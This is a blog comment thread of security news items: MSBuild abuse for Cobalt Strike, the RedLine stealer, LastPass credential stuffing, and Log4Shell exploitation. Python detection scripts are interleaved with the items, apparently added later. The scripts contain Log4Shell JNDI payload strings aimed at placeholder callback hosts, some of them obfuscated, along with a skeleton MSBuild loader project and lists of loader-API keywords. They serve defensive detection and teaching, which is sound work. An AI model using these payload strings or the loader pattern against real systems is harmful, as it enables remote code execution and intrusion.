  39. Tomi Engdahl says:

    Mariam Baksh / Nextgov:
    Biden signs the annual defense bill codifying voluntary cybersecurity frameworks for the private sector, which operates the bulk of US’s critical infrastructure

    Biden Signs NDAA Relying on Voluntary Private-Sector Cybersecurity Collaboration
    https://www.nextgov.com/cybersecurity/2021/12/biden-signs-ndaa-relying-voluntary-private-sector-cybersecurity-collaboration/360217/

    Major breaches over the past year were a double-edged sword in efforts to pass a crucial mandatory reporting measure that didn’t make it into the ‘must-pass’ legislation despite bipartisan support, according to key lawmakers.

    President Joe Biden on Monday signed into law the National Defense Authorization Act of 2022 which codifies an approach to cybersecurity that depends on the decisions of private-sector entities to protect the bulk of the nation’s critical infrastructure.

    The NDAA has become the go-to legislative vehicle for efforts to manage the federal government at large, and to regulate the private sector on cybersecurity issues.

    On the government side, the law requires the Cybersecurity and Infrastructure Security Agency to biennially update an incident response plan and to consult with sector-specific agencies and the private sector in establishing an exercise program to assess its effectiveness.

    It seeks to “ensure that the National Guard can provide cyber support services to critical infrastructure entities—including local governments and businesses,” according to Sen. Maggie Hassan, D-N.H. It also establishes a grant program at the Homeland Security Department to foster collaboration on cybersecurity technologies between public and private-sector entities in the U.S. and Israel.

    Lawmakers also highlighted the inclusion of provisions codifying existing public-private partnerships at CISA which aim to offer continuous monitoring of industrial control systems—an effort known as the CyberSentry program—and to develop ‘know your customer’ guidelines for companies like cloud and other service providers comprising the “internet ecosystem.” Such companies are described as the plank bearers of CISA’s Joint Cyber Defense Collaborative.

    Reply
  40. Tomi Engdahl says:

    FBI Confirms Zodiac Killer’s Infamous 340 Cipher Has Been Decoded, And His Message Finally Revealed
    https://www.iflscience.com/editors-blog/fbi-confirms-zodiac-killers-infamous-340-cipher-has-been-decoded-and-his-message-finally-revealed/

    The FBI have confirmed that a group of codebreakers have managed to crack the infamous 340 cipher used by the Zodiac Killer over 50 years ago.

    In the late 1960s, heading into the early 1970s, a serial killer going by the pseudonym “Zodiac” murdered at least five people in California. During his spree, the killer sent taunting messages to the press written through a cipher, where letters are substituted for different letters or numbers (or in the case of the Zodiac killer, a series of symbols).

    Reply
  41. Tomi Engdahl says:

    Threat Actors Abuse MSBuild for Cobalt Strike Beacon Execution
    https://www.securityweek.com/threat-actors-abuse-msbuild-cobalt-strike-beacon-execution

    Recently observed malicious campaigns have abused Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised machines.

    Designed for the creation of applications on Windows, MSBuild uses a project file element called ‘Tasks’ to designate components that are executed during project building, and threat actors are abusing these Tasks to run malicious code disguised as MSBuild.

    Over the past week, Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler Renato Marinho says, two different malicious campaigns were observed abusing MSBuild for code execution.

    The threat actors typically gain access to the target environment using a valid remote desktop protocol (RDP) account, leverage remote Windows Services (SCM) for lateral movement, and abuse MSBuild to execute the Cobalt Strike Beacon payload.

    The malicious MSBuild project was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike.

    Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons
    https://isc.sans.edu/diary/rss/28180

    Microsoft Build Engine is the platform for building applications on Windows, mainly used in environments where Visual Studio is not installed. Also known as MSBuild, the engine provides an XML schema for a project file that controls how the build platform processes and builds software [1]. The project file element named ‘Tasks’ designates independent executable components to run during the project building. Tasks are meant to perform build operations but are being abused by attackers to run malicious code under the MSBuild disguise. The technique is mapped on Mitre ATT&CK as “Trusted Developer Utilities Proxy Execution” – T1127.001.

    This is the second malicious campaign I got using MSBuild in less than a week. Usually, it starts with an RDP access using a valid account, spreads over the network via remote Windows Services (SCM), and pushes Cobalt Strike beacon to corporate hosts abusing the MSBuild task feature as described in today’s diary.

    Reply
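The T1127.001 technique in the diary above relies on MSBuild's inline-task feature: a `UsingTask` with `TaskFactory="CodeTaskFactory"` (or `RoslynCodeTaskFactory`) carries C# source in a `<Code>` element that MSBuild compiles and runs at build time. The following is an added example, not code from the ISC diary, SecurityWeek or Microsoft: it parses a project file, lists every inline task, and flags those whose embedded source references loader-style APIs. The sample project is constructed for the example with a placeholder body; the token list is this example's own heuristic, not an official indicator set.

```python
"""Flag MSBuild project files that carry inline C#/VB tasks (T1127.001).

Added example; not code from the ISC diary or SecurityWeek. The sample
project below is constructed for illustration and carries no payload.
"""
import xml.etree.ElementTree as ET

INLINE_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}

# Heuristic token list (this example's own choice): APIs that a genuine
# build step rarely needs but an in-memory loader almost always does.
SUSPICIOUS_TOKENS = (
    "VirtualAlloc",
    "CreateThread",
    "FromBase64String",
    "Marshal.Copy",
    "GetDelegateForFunctionPointer",
    "DllImport",
)


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def find_inline_tasks(project_xml):
    """Return one dict per UsingTask that embeds source code.

    Each dict carries the task name, the factory, the code language and
    the suspicious tokens found in the embedded source (empty if none).
    """
    root = ET.fromstring(project_xml)
    findings = []
    for elem in root.iter():
        if _local(elem.tag) != "UsingTask":
            continue
        factory = elem.get("TaskFactory", "")
        if factory.lower() not in INLINE_FACTORIES:
            continue
        code_text, language = "", ""
        for child in elem.iter():
            if _local(child.tag) == "Code":
                code_text = child.text or ""
                language = child.get("Language", "cs")
        findings.append({
            "task": elem.get("TaskName", ""),
            "factory": factory,
            "language": language,
            "hits": [t for t in SUSPICIOUS_TOKENS if t in code_text],
        })
    return findings


def is_suspicious(project_xml):
    """True when any inline task references a loader-style API."""
    return any(f["hits"] for f in find_inline_tasks(project_xml))


# Constructed sample: the shape of an abusive project, with a placeholder
# body instead of any real second-stage code.
SAMPLE_PROJECT = r"""<Project ToolsVersion="4.0"
         xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <RunStage />
  </Target>
  <UsingTask TaskName="RunStage" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        using System;
        using System.Runtime.InteropServices;
        public class RunStage : Microsoft.Build.Utilities.Task {
          [DllImport("kernel32")] static extern IntPtr VirtualAlloc(
              IntPtr a, uint s, uint t, uint p);
          public override bool Execute() {
            byte[] blob = Convert.FromBase64String("AAAA"); // placeholder
            return true;
          }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""

if __name__ == "__main__":
    for finding in find_inline_tasks(SAMPLE_PROJECT):
        print(finding)
```

Run it over project files collected from hosts where `msbuild.exe` was launched outside a developer context; the token list errs toward false positives on purpose, since an inline task that imports `kernel32` functions deserves a human look regardless of what it claims to build.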
  42. Tomi Engdahl says:

    RedLine malware shows why passwords shouldn’t be saved in browsers
    https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/

    The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea.

    This malware is a commodity information-stealer that can be purchased for roughly $200 on cyber-crime forums and be deployed without requiring much knowledge or effort.

    Even though the infected computer had an anti-malware solution installed, it failed to detect and remove RedLine Stealer.

    The malware targets the ‘Login Data’ file found on all Chromium-based web browsers and is an SQLite database where usernames and passwords are saved.

    Reply
  43. Tomi Engdahl says:

    Threat actor uses HP iLO rootkit to wipe servers https://therecord.media/threat-actor-uses-hp-ilo-rootkit-to-wipe-servers/
    An Iranian cyber-security firm said it discovered a first-of-its-kind rootkit that hides inside the firmware of HP iLO devices and which has been used in real-world attacks to wipe servers of Iranian organizations. Named iLOBleed, the rootkit was discovered by Tehran-based security firm Amnpardaz and detailed in a report released on Tuesday. According to the company, iLOBleed targets HP iLO (Integrated Lights-Out), a hardware device that can be added to servers or workstations as an add-on board.

    Reply
  44. Tomi Engdahl says:

    Microsoft Defender Log4j scanner triggers false positive alerts https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-log4j-scanner-triggers-false-positive-alerts/
    Microsoft Defender for Endpoint is currently showing “sensor tampering” alerts linked to the company’s newly deployed Microsoft 365 Defender scanner for Log4j processes. The alerts are reportedly mainly shown on Windows Server 2016 systems and warn of “possible sensor tampering in memory was detected by Microsoft Defender for Endpoint” created by an OpenHandleCollector.exe process.

    Reply
  45. Tomi Engdahl says:

    AvosLocker ransomware gives free decryptor to US police dept https://www.bleepingcomputer.com/news/security/avoslocker-ransomware-gives-free-decryptor-to-us-police-dept/
    The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency. Last month, a US police department was breached by AvosLocker, who encrypted devices and stole data during the attack. However, according to a screenshot shared by security researcher pancak3, after learning that the victim was a government agency, they provided a decryptor for free.

    Reply
  46. Tomi Engdahl says:

    LastPass Automated Warnings Linked to ‘Credential Stuffing’ Attack
    https://www.securityweek.com/lastpass-automated-warnings-linked-%E2%80%98credential-stuffing%E2%80%99-attack

    Users of the popular LastPass password manager are being targeted in so-called “credential stuffing” attacks that use email addresses and passwords obtained from third-party breaches.

    That’s the official word from LastPass in response to public reports that some users received blocked access emails warnings that are normally sent to users who log in from different devices and locations.

    Reply
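Credential stuffing, as described in the two LastPass items above, has a recognisable shape in authentication logs: one source tries leaked email/password pairs against many different accounts with a low success rate, or a botnet spreads one pair across many source IPs. The block below is an added example, not LastPass's own detection logic: it runs both checks over a constructed event list and lists the accounts whose reused password actually worked and need a forced reset. The function names, thresholds and documentation-range IPs are this example's own choices.

```python
"""Credential-stuffing detection over authentication events.

Added example; not LastPass's own logic. Events below are constructed
and use documentation-range IP addresses.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _t(s):
    return datetime.fromisoformat(s)


# Constructed sample: (timestamp, account, source_ip, result). One source
# sprays leaked pairs at six accounts, one user logs in normally, and one
# account is tried from four different nodes.
EVENTS = [
    ("2021-12-28T09:00:00", "alice@example.org", "198.51.100.7", "fail"),
    ("2021-12-28T09:00:02", "bob@example.org", "198.51.100.7", "fail"),
    ("2021-12-28T09:00:04", "carol@example.org", "198.51.100.7", "fail"),
    ("2021-12-28T09:00:05", "dave@example.org", "198.51.100.7", "success"),
    ("2021-12-28T09:00:07", "erin@example.org", "198.51.100.7", "fail"),
    ("2021-12-28T09:00:09", "frank@example.org", "198.51.100.7", "fail"),
    ("2021-12-28T09:05:00", "alice@example.org", "192.0.2.10", "success"),
    ("2021-12-28T09:10:00", "alice@example.org", "192.0.2.10", "success"),
    ("2021-12-28T10:00:00", "grace@example.org", "203.0.113.4", "fail"),
    ("2021-12-28T10:03:00", "grace@example.org", "203.0.113.55", "fail"),
    ("2021-12-28T10:07:00", "grace@example.org", "203.0.113.90", "fail"),
    ("2021-12-28T10:09:00", "grace@example.org", "198.51.100.200", "fail"),
]


def stuffing_sources(events, window=timedelta(minutes=10), min_accounts=5,
                     max_success=0.5):
    """IPs that try >= min_accounts distinct accounts within `window` with a
    success ratio at or below max_success (one source, many accounts)."""
    by_ip = defaultdict(list)
    for ts, acct, ip, result in events:
        by_ip[ip].append((_t(ts), acct, result))
    flagged = {}
    for ip, rows in by_ip.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):  # sliding time window over this IP
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            accounts = {a for _, a, _ in span}
            if len(accounts) < min_accounts:
                continue
            successes = sum(1 for _, _, r in span if r == "success")
            if successes / len(span) <= max_success:
                flagged[ip] = {"accounts": len(accounts), "successes": successes}
    return flagged


def distributed_targets(events, window=timedelta(minutes=15), min_ips=3):
    """Accounts with failed logins from >= min_ips distinct IPs within `window`
    (one account, many sources), which per-IP thresholds miss."""
    by_acct = defaultdict(list)
    for ts, acct, ip, result in events:
        if result != "success":
            by_acct[acct].append((_t(ts), ip))
    flagged = {}
    for acct, rows in by_acct.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            ips = {ip for _, ip in rows[start:end + 1]}
            if len(ips) >= min_ips:
                flagged[acct] = sorted(ips)
    return flagged


def compromised_logins(events, sources):
    """Accounts that a flagged stuffing source logged into successfully:
    their reused password is burned and must be reset."""
    return sorted({a for _, a, ip, r in events if r == "success" and ip in sources})


if __name__ == "__main__":
    sources = stuffing_sources(EVENTS)
    print("stuffing sources:", sources)
    print("distributed targets:", distributed_targets(EVENTS))
    print("force reset:", compromised_logins(EVENTS, sources))
```

The thresholds are deliberately conservative for a small sample; on a real login service they are tuned against the baseline of legitimate shared egress (corporate NAT, mobile carriers), which is exactly why the per-account check is kept alongside the per-IP one.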
  47. Tomi Engdahl says:

    Chinese Spies Exploit Log4Shell to Hack Major Academic Institution
    https://www.securityweek.com/chinese-spies-exploit-log4shell-hack-major-academic-institution

    China-linked cyberespionage group Aquatic Panda was recently observed exploiting the Log4Shell vulnerability to compromise a large academic institution, CrowdStrike’s Falcon OverWatch team reports.

    Tracked as CVE-2021-44228 and also referred to as Log4Shell and LogJam, the security hole affects the Apache Log4j Java logging framework and has been exploited in targeted attacks since early December.

    As part of a recent campaign, the OverWatch security researchers observed Aquatic Panda leveraging a modified version of the Log4j exploit for initial access, and then performing various post-exploitation operations, including reconnaissance and credential harvesting.

    In their attempt to compromise the unnamed academic institution, the attackers targeted a VMware Horizon instance that employed the vulnerable Log4j library. The exploit used in this attack was initially published on GitHub on December 13.

    The attackers performed connectivity checks via DNS lookups for a subdomain running on the VMware Horizon instance, under the Apache Tomcat service (other threat actors too have been observed using public DNS logging services to identify vulnerable servers).

    Next, Aquatic Panda executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, including some aimed at deploying attacker tools hosted on remote infrastructure.

    Reply
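The "modified version of the Log4j exploit" and the DNS-based connectivity checks mentioned above are why a plain search for `${jndi:` misses real traffic: attackers nest Log4j lookups (`${${lower:j}ndi:...}`, `${::-j}`, `${env:NaN:-j}`) so the marker only appears after the logging framework resolves them. The block below is an added example, not code from CrowdStrike or SecurityWeek: it collapses the common nested-lookup idioms the way Log4j 2.x would, then matches the resolved `${jndi:scheme://host...}` and extracts the callback host so it can be hunted for in DNS logs. The log lines are constructed and the hostnames are placeholders; the set of resolved lookup types is this example's assumption about which idioms matter.

```python
"""Obfuscation-aware detector for Log4Shell (CVE-2021-44228) lookups.

Added example; not code from CrowdStrike or SecurityWeek. The log lines
below are constructed and the hosts in them are placeholders.
"""
import re

# An innermost ${...} lookup: its body contains no further '${' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# The resolved marker: ${jndi:<scheme>:<//>host...}
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):/*([^/\s}]+)", re.IGNORECASE)


def _resolve(body):
    """Collapse one innermost lookup for the idioms seen in attack traffic."""
    if ":-" in body:                      # ${::-j} or ${env:NOPE:-j} -> default value
        return body.split(":-", 1)[1]
    name, _, arg = body.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    if name == "date":                    # ${date:'j'} -> j
        return arg.replace("'", "")
    return arg                            # unknown lookup: keep the text visible


def normalize(text, max_rounds=20):
    """Resolve nested lookups inside out, leaving any ${jndi:...} intact."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            body = m.group(1)
            if body.lower().startswith("jndi:"):
                return m.group(0)         # keep the marker for matching
            changed = True
            return _resolve(body)

        text = INNER.sub(sub, text)
        if not changed:
            break
    return text


def scan_line(line):
    """Return scheme/host/normalized text for a line carrying a JNDI lookup."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        "host": m.group(2).split(":")[0],  # drop any :port
        "normalized": norm,
    }


def scan(lines):
    """(index, finding) for every line that resolves to a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((i, finding))
    return hits


def callback_hosts(lines):
    """Distinct callback hosts, the list to pivot on in DNS and proxy logs."""
    return sorted({f["host"] for _, f in scan(lines)})


# Constructed access-log lines: one benign, one plain, two obfuscated.
LOGS = [
    '10.0.0.5 - - "GET /portal HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:LDAP}://probe.example.net/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${env:NaN:-n}di:dns://canary.example.net/chk}"',
]

if __name__ == "__main__":
    for i, finding in scan(LOGS):
        print(i, finding["scheme"], finding["host"])
    print("hunt for:", callback_hosts(LOGS))
```

Because the normaliser keeps unknown lookup text rather than dropping it, a line that uses a lookup this example does not model still stays visible in the output; that bias is deliberate, since the cost of a missed JNDI string on a VMware Horizon or Tomcat front end is far higher than a false positive.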
